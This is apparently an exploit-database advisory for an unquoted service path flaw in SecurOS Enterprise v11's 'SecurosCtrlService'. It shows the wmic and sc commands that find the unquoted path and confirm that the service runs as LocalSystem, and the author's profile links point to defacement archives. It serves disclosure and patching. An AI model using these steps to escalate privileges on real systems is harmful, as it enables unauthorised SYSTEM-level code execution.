Intelligent Security System SecurOS Enterprise version 11 suffers from an unquoted service path vulnerability.
6abe26bb5c5ed5ca9a1c0dc557fe3d83faf3e167d06c216601fb62c5577d2b10
# Exploit Title: Intelligent Security System SecurOS Enterprise v11 -
Unquoted Service Path
# Date: 2024-11-25
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# t.me/Ci3c0
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Vendor Homepage:
https://www.issivs.com/product-detail/secure-os-enterprise/
# Software Link: https://www.issivs.com/schedule-a-free-demo/
# Version: 11
# Tested on: Windows 10 Pro x64 Esp
# Version: 11
# Schedule A Free Demo - ISS - Intelligent Security Systems<
https://www.issivs.com/schedule-a-free-demo/>
# Schedule a Free Demo A leading developer of security surveillance and
control systems for
# networked digital video and audio recording, video image pattern
processing and digital data transmission.
# www.issivs.com
# Summary: ISS’ global standard for video management, access control and
video analytics, SecurOS™ Enterprise is perfectly suited for
# managing large and demanding installations. The Enterprise framework can
manage and monitor an unlimited number of cameras and devices, apply
# intelligent video analytics, and act as an integration platform for a
variety of 3rd party systems. Built to handle enterprise level deployments,
# SecurOS Enterprise, comes with built-in Native Failure functionality,
Microsoft Active Directory / LDAP integration, and has an extensive set
# of Cybersecurity features making it one of the most reliable and secure
video management platforms in the market today. SecurOS Enterprise
# supports all the features of the other 3 editions.
# Description: The application suffers from an unquoted search path
issue impacting the service 'SecurosCtrlService'. This could potentially
allow an
# authorized but non-privileged local user to execute arbitrary code with
elevated privileges on the system. A successful attempt would require
# the local user to be able to insert their code in the system root path
undetected by the OS or other security applications where it could
# potentially be executed during application startup or reboot. If
successful, the local user’s code would execute with the elevated privileges
# of the application.
# Step to discover the unquoted Service:
C:\Users\user>wmic service get name, displayname, pathname, startmode |
findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
SecurOS Control Service SecurosCtrlService C:\Program Files
(x86)\ISS\SecurOS\securos_svc.exe Auto
# Service info:
C:\>sc qc SecurosCtrlService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: SecurosCtrlService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\ISS\SecurOS\securos_svc.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : SecurOS Control Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem